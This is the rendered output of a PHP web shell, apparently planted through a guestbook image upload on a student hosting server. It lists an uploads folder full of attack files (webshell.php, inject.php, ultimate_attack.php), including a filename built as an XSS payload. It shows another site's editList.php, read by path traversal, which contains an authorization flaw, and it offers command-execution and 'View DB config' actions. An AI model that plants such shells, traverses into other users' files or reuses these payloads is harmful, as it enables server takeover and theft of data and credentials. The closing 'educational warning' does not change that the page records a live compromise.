🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../583521.klas4s23.mid-ica.nl/public_html/e-learing/editList.php

<?php

require 'database.php';

session_start();
if (!isset($_SESSION['user_id'])) {
    header("Location: login.php");
    exit;
}

if (isset($_GET['list_id'])) {
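    $list_id = $_GET['list_id'];

    // Fetch the list data.
    // Note: the lookup is by id only; nothing here checks that the list
    // belongs to the logged-in user ($_SESSION['user_id']).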
    $stmt = $pdo->prepare("SELECT * FROM lists WHERE id = ?");
    $stmt->execute([$list_id]);
    $list = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($list) {
        // Decode questions and answers for display
        $questions = json_decode($list['questions']);
        $answers = json_decode($list['answers']);
    } else {
        echo "List not found.";
        exit;
    }
} else {
    echo "No list specified.";
    exit;
}

// Process form submission
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_GET['list_id'])) {
    $name = $_POST['name'];
    $mode = $_POST['mode'];
    $questions = json_encode($_POST['questions']);
    $answers = json_encode($_POST['answers']);

    // Update the list in the database
    $stmt = $pdo->prepare("UPDATE lists SET name = ?, mode = ?, questions = ?, answers = ? WHERE id = ?");
    $stmt->execute([$name, $mode, $questions, $answers, $list_id]);

    // Redirect back to the dashboard
    header("Location: dashboard.php");
    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Edit List</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="list-container">
    <h2>Bewerk Quiz</h2>
    <form action="editList.php?list_id=<?php echo urlencode($list_id); ?>" method="post">
        <label for="name">Quiz Naam:</label>
        <input type="text" id="name" name="name" value="<?php echo htmlspecialchars($list['name']); ?>">

        <label for="mode">Mode:</label>
        <select id="mode" name="mode">
            <option value="Privé" <?php if ($list['mode'] == 'Privé') echo 'selected'; ?>>Privé</option>
            <option value="Openbaar" <?php if ($list['mode'] == 'Openbaar') echo 'selected'; ?>>Openbaar</option>
        </select>

        <?php for ($i = 0; $i < 3; $i++): ?>
            <label for="question<?php echo $i; ?>">Vraag <?php echo ($i + 1); ?>:</label>
            <input type="text" id="question<?php echo $i; ?>" name="questions[]" value="<?php echo htmlspecialchars($questions[$i] ?? ''); ?>">

            <label for="answer<?php echo $i; ?>">Antwoord <?php echo ($i + 1); ?>:</label>
            <input type="text" id="answer<?php echo $i; ?>" name="answers[]" value="<?php echo htmlspecialchars($answers[$i] ?? ''); ?>">
        <?php endfor; ?>

        <button type="submit" name="save">Opslaan</button>
    </form>
    </div>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👀 Show user | 📁 Show directory | 🔄 Show processes | Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!